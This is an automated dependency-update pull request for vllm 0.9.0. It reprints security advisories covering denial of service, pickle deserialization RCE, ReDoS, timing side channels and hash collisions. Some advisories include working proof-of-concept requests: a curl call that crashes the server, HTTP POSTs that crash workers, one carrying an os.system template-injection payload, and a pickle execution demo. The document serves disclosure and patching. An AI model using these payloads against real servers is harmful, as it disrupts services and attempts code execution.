Update dependency vllm to v0.9.0 [SECURITY] - autoclosed #31
This PR contains the following updates:
vllm ==0.8.0 -> ==0.9.0
GitHub Vulnerability Alerts
GHSA-hf3c-wxg2-49q9
Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
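As a hedged illustration of that per-request selection (the server URL, model name, and schema below are placeholders, not taken from the advisory):

```python
# Hedged sketch: selecting the xgrammar guided-decoding backend per request
# against a vLLM OpenAI-compatible server (V0 engine). The base URL, model
# name, and schema are illustrative placeholders.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

resp = client.chat.completions.create(
    model="my-model",  # placeholder model name
    messages=[{"role": "user", "content": "Return a JSON object with a 'name' field."}],
    extra_body={
        "guided_json": {"type": "object", "properties": {"name": {"type": "string"}}},
        "guided_decoding_backend": "xgrammar",  # per-request backend choice (V0 engine)
    },
)
print(resp.choices[0].message.content)
```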
Patches
Workarounds
There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
CVE-2025-30202
Impact
In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.
Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcast to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.
By connecting to this socket many times and not reading the data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.
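As a generic sketch of the exposure, not vLLM's actual code: an XPUB socket bound to all interfaces accepts any reachable subscriber, while binding to a specific address narrows who can connect.

```python
# Illustrative sketch only (not vLLM's implementation): contrast binding an
# XPUB socket to all interfaces versus a specific interface.
import zmq

ctx = zmq.Context()

# Exposed: any host that can reach this machine may connect and subscribe.
exposed = ctx.socket(zmq.XPUB)
exposed_port = exposed.bind_to_random_port("tcp://*")

# Narrower: only clients that can reach this address may connect.
# 127.0.0.1 stands in for a private cluster address.
scoped = ctx.socket(zmq.XPUB)
scoped_port = scoped.bind_to_random_port("tcp://127.0.0.1")

print(f"exposed on *:{exposed_port}, scoped on 127.0.0.1:{scoped_port}")
```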
Detailed Analysis
The XPUB socket in question is created here:
https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237
Data is published over this socket via MessageQueue.enqueue(), which is called by MessageQueue.broadcast_object():
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478
The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366
The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219
The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936
To determine what data is broadcast to the tensor parallelism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcast_tensor_dict():
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489
which is called by broadcast_tensor_dict() in communication_op.py:
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34
If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352
but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed, and only metadata about those tensors is sent via ZeroMQ:
https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83
Patches
Workarounds
Prior to the fix, your options include blocking network access to the port used by the XPUB socket (note that the port used is random).
References
CVE-2025-32444
Impacted Deployments
Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.
Description
vLLM's integration with mooncake is vulnerable to remote code execution due to using pickle-based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack. This is similar to GHSA-x3m8-f7g5-qhm7; the problem is in
https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179
Here, recv_pyobj() contains an implicit pickle.loads(), which leads to potential RCE. A generic illustration of why this is dangerous follows.
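The sketch below is a generic demonstration (unrelated to mooncake's actual wire format) of why an implicit pickle.loads on attacker-controlled bytes amounts to code execution:

```python
# Generic illustration of why unpickling untrusted bytes is remote code
# execution: __reduce__ lets the payload choose a callable to run on load.
import pickle


class Payload:
    def __reduce__(self):
        import os
        # A harmless command stands in for an attacker's arbitrary code.
        return (os.system, ("echo code executed during pickle.loads",))


malicious_bytes = pickle.dumps(Payload())
pickle.loads(malicious_bytes)  # runs the command as a side effect of loading
```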
CVE-2025-46560
Summary
A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs.
Details
Affected Component: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197
The code rebuilds the input_ids list using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) work per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.
PoC
Test data demonstrates quadratic time growth:
Doubling input size increases runtime by ~4x (consistent with O(n²)).
Impact
Denial-of-Service (DoS): An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.
Remediation Recommendations
Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array, as in the sketch below.
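A minimal sketch of that remediation, assuming a hypothetical expansions mapping from placeholder token id to replacement tokens (the real phi4mm preprocessing data is not reproduced here):

```python
# Sketch of the remediation: build the expanded token list in one pass instead
# of repeated list concatenation. The placeholder id and expansion table are
# hypothetical stand-ins for the real phi4mm preprocessing data.
from typing import Dict, List


def expand_quadratic(input_ids: List[int], expansions: Dict[int, List[int]]) -> List[int]:
    # O(n^2)-style pattern: each replacement copies the whole list.
    i = 0
    while i < len(input_ids):
        if input_ids[i] in expansions:
            tokens = expansions[input_ids[i]]
            input_ids = input_ids[:i] + tokens + input_ids[i + 1:]
            i += len(tokens)
        else:
            i += 1
    return input_ids


def expand_linear(input_ids: List[int], expansions: Dict[int, List[int]]) -> List[int]:
    # Single pass: append to one output list, never re-copying the prefix.
    out: List[int] = []
    for tok in input_ids:
        out.extend(expansions.get(tok, [tok]))
    return out


if __name__ == "__main__":
    PLACEHOLDER = -1  # hypothetical placeholder token id
    ids = [PLACEHOLDER if i % 3 == 0 else i for i in range(3_000)]
    table = {PLACEHOLDER: [7] * 10}  # each placeholder expands to 10 tokens
    assert expand_quadratic(ids, table) == expand_linear(ids, table)
```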
CVE-2025-47277
Impacted Environments
This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.
Summary
vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.
A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit it by sending malicious serialized data to gain server control privileges.
The intention was that this interface should only be exposed to a private network, using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html
Unfortunately, the default behavior of PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided; the IP address given was only used as a client-side address. vLLM was fixed to use a workaround that forces the TCPStore instance to bind its socket to the specified private interface. This issue was reported privately to PyTorch, and they determined that this behavior was intentional.
Details
The PyNcclPipe implementation contains a critical security flaw: it directly processes client-provided data using pickle.loads, creating an unsafe deserialization vulnerability that can lead to Remote Code Execution. Consider a PyNcclPipe service configured to listen on port 18888 when launched; an attacker can send crafted serialized payloads to the PyNcclPipe service. The call stack triggering RCE is as follows:
A shell is obtained as follows:
Reporters
This issue was reported independently by three different parties:
Fix
vLLM now binds the TCPStore socket to the private interface as configured.
CVE-2025-48887
Summary
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.
Details
The following regular expression is used to match tool/function call patterns:
This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions, which make it vulnerable to catastrophic backtracking.
Attack Example:
A malicious input such as
can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).
Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.
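The vulnerable pattern itself is not reproduced here; the sketch below uses a generic nested-quantifier regex to show how catastrophic backtracking grows with input length.

```python
# Generic catastrophic-backtracking demo (not the actual vLLM pattern): a
# nested quantifier forces the engine to try exponentially many partitions
# of the input before the match finally fails.
import re
import time

PATTERN = re.compile(r"^(a+)+$")

for n in range(16, 27, 2):
    text = "a" * n + "!"  # the trailing "!" guarantees a failed match
    start = time.perf_counter()
    PATTERN.match(text)
    print(f"n={n:2d} took {time.perf_counter() - start:.3f}s")
```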
Impact
Fix
GHSA-j828-28rj-hfhp
Summary
A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.
1. vllm/lora/utils.py Line 173
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:
r"\((.*?)\)\$?$"matches content inside parentheses. If input such as((((a|)+)+)+)is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability..*?(non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.Remediation Suggestions:
2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52
Risk Description:
r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.
Remediation Suggestions:
Limit the length of model_output. Use re.finditer() and enforce a length constraint on each match.
3. vllm/entrypoints/openai/serving_chat.py Line 351
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351
Risk Description:
r'.*"parameters":\s*(.*)'can trigger backtracking ifcurrent_textis very long and contains repeated structures..*matching any content is high risk.Remediation Suggestions:
current_textlength..*to capture large blocks of text; prefer structured parsing when possible.4. benchmarks/benchmark_serving_structured_output.py Line 650
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650
Risk Description:
r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Remediation Suggestions:
Limit the length of actual. Prefer balanced matching between { and }, or use a robust JSON extraction tool (a hedged sketch is shown below).
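A hedged sketch of such an extraction, using the standard library's json.JSONDecoder.raw_decode instead of a backtracking-prone regex:

```python
# Sketch: extract the first JSON object embedded in arbitrary text without a
# regex, using json.JSONDecoder.raw_decode to find the matching closing brace.
import json
from typing import Any, Optional


def extract_first_json_object(text: str, max_len: int = 100_000) -> Optional[Any]:
    text = text[:max_len]  # length limit as an extra guard
    decoder = json.JSONDecoder()
    start = text.find("{")
    while start != -1:
        try:
            obj, _end = decoder.raw_decode(text, start)
            return obj
        except json.JSONDecodeError:
            start = text.find("{", start + 1)
    return None


print(extract_first_json_object('noise {"answer": 42} trailing'))  # {'answer': 42}
```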
Fix
CVE-2025-46570
This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.
Description
When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.
For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.
Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
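A hedged sketch of how TTFT can be measured from the client side with a streaming request (the base URL and model name are placeholders); repeating this for prompts that do and do not share a cached prefix is how such timing differences can be compared:

```python
# Sketch: measure time-to-first-token (TTFT) for a prompt via the streaming
# OpenAI-compatible API. The base URL and model name are placeholders.
import time
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")


def measure_ttft(prompt: str, model: str = "my-model") -> float:
    start = time.perf_counter()
    stream = client.completions.create(
        model=model, prompt=prompt, max_tokens=1, temperature=0.0, stream=True
    )
    for _chunk in stream:  # the first chunk marks the first token
        return time.perf_counter() - start
    return float("inf")


print(measure_ttft("guessed prefix to test against the cache"))
```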
Environment
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage
We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results
In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:
Fixes
CVE-2025-46722
Summary
In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image's shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.
Details
vllm/multimodal/hasher.py, MultiModalHasher.serialize_item:
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
For Image.Image instances, only obj.tobytes() is used for hashing; obj.tobytes() does not include the image's width, height, or mode metadata. A hedged sketch of the resulting collision is shown below.
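A minimal sketch of the collision, with SHA-256 standing in for vLLM's actual hasher:

```python
# Sketch: two differently shaped images with identical raw pixel bytes hash
# identically when only tobytes() is used; adding size/mode/info to the
# serialization separates them. SHA-256 stands in for vLLM's actual hasher.
import hashlib
from PIL import Image

pixels = (bytes(range(256)) * 12)[: 30 * 100]  # 3000 bytes of pixel data

img_a = Image.frombytes("L", (30, 100), pixels)
img_b = Image.frombytes("L", (100, 30), pixels)

# Pixel-data-only serialization: collision.
assert hashlib.sha256(img_a.tobytes()).digest() == hashlib.sha256(img_b.tobytes()).digest()


def serialize_with_metadata(img: Image.Image) -> bytes:
    meta = f"{img.size}|{img.mode}|{img.format}|{sorted(img.info.items())}".encode()
    return meta + img.tobytes()


# Metadata-aware serialization: no collision.
assert (
    hashlib.sha256(serialize_with_metadata(img_a)).digest()
    != hashlib.sha256(serialize_with_metadata(img_b)).digest()
)
print("pixel-only hashes collide; metadata-aware hashes differ")
```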
Recommendation
In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata, such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important for palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.
Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.
Impact for other modalities
For other modalities: the video modality is transformed into a multi-dimensional numpy array containing the video's length, width, time, and so on, so the same problem exists there as well, due to the same incorrect numpy serialization. For audio, the mono option in librosa.load is left enabled, so the loaded audio is automatically downmixed to a single channel by librosa and returned as a one-dimensional numpy array; the array structure is therefore fixed and not affected by this issue.
Fixes
CVE-2025-48942
Summary
Hitting the /v1/completions API with an invalid json_schema as a guided param will kill the vLLM server.
Details
The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in ./lib64/python3.11/site-packages/xgrammar/compiler.py
Issue with more information: https://github.com/vllm-project/vllm/issues/17248
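As a hedged sketch (not the fix vLLM shipped), such a schema could be rejected before reaching the grammar compiler by validating it against the JSON Schema meta-schema with the third-party jsonschema package:

```python
# Sketch: validate a guided_json schema against the JSON Schema meta-schema
# before handing it to the grammar compiler. Uses the third-party `jsonschema`
# package; this is illustrative, not the change vLLM actually shipped.
import json
from jsonschema import Draft202012Validator
from jsonschema.exceptions import SchemaError

raw = '{"properties":{"reason":{"type": "stsring"}}}'

try:
    schema = json.loads(raw)
    Draft202012Validator.check_schema(schema)  # raises because "stsring" is not a valid type
except (json.JSONDecodeError, SchemaError) as exc:
    print(f"rejecting invalid guided_json: {exc}")
```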
PoC
Make a call to vLLM with an invalid json_schema, e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}:
curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
Impact
vllm crashes
example traceback
Fix
CVE-2025-48943
Impact
A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.
Issue with more details: https://github.com/vllm-project/vllm/issues/17313
Patches
CVE-2025-48944
Summary
The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.
Details
The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:
RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.
For example, the following inputs will crash the worker:
Unclosed {, [, or (
Closed: {} and []
Here are some of the runtime errors on the crash, depending on what gets injected:
RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
PoC
Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to an RCE payload; it could have just been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}
Impact
Backend workers can be crashed, causing anyone using the inference engine to get 500 internal server errors on subsequent requests.
Fix
Release Notes
vllm-project/vllm (vllm)
v0.9.0 (Compare Source)
Highlights
This release features 649 commits, from 215 contributors (82 new contributors!)
pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whl, then set VLLM_ATTENTION_BACKEND=FLASHINFER for better performance.
Notable Changes
top_k can now be disabled with 0 (still accepting -1 for now) (#17773)
The seed is now 0 by default for the V1 Engine, meaning that different vLLM runs now yield the same outputs even if temperature > 0. This does not modify the random state in user code, since workers are run in separate processes unless VLLM_USE_V1_MULTIPROCESSING=0. (#17929, #18741)
Model Enhancements
Install transformers (from source) to use Falcon-H1.
Performance, Production and Scaling
torchrun (#17827)
Security
VLLM_ALLOW_INSECURE_SERIALIZATION env var (#17490)
Features
deprecated=True (#17426)
chat_template_kwargs in LLM.chat (#17356), /classify endpoint (#17032), truncation control for embedding models (#14776), cached_tokens in response usage (#18149)
nvidia/DeepSeek-R1-FP4 (#16362), Quark MXFP4 format (#16943), AutoRound (#17850), torchao models with AOPerModuleConfig (#17826), CUDA Graph support for V1 GGUF support (#18646)
--enable-reasoning (#17452)
tool_choice: required for Xgrammar (#17845), Structural Tag with Guidance backend (#17333)
Hardwares
Documentation
--torch-backend=auto (#18505)
Developer Facing
vllm.multimodal (#18031)
ruff format (#17656, #18068, #18400)
What's Changed
numel() downcast in fused_layernorm_dynamic_per_token_quant.cu by @r-barnes in https://github.com/vllm-project/vllm/pull/17316
'<string>' filepath by @zou3519 in https://github.com/vllm-project/vllm/pull/17330
pre-commit autoupdate by @hmellor in https://github.com/vllm-project/vllm/pull/17380
chat_template_kwargs in LLM.chat by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17356
cutlass_mla_decode for ROCm build by @tywuAMD in https://github.com/vllm-project/vllm/pull/17289
python3 setup.py develop replaced with standard pip install --e on TPU by @NickLucche in https://github.com/vllm-project/vllm/pull/17374
Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.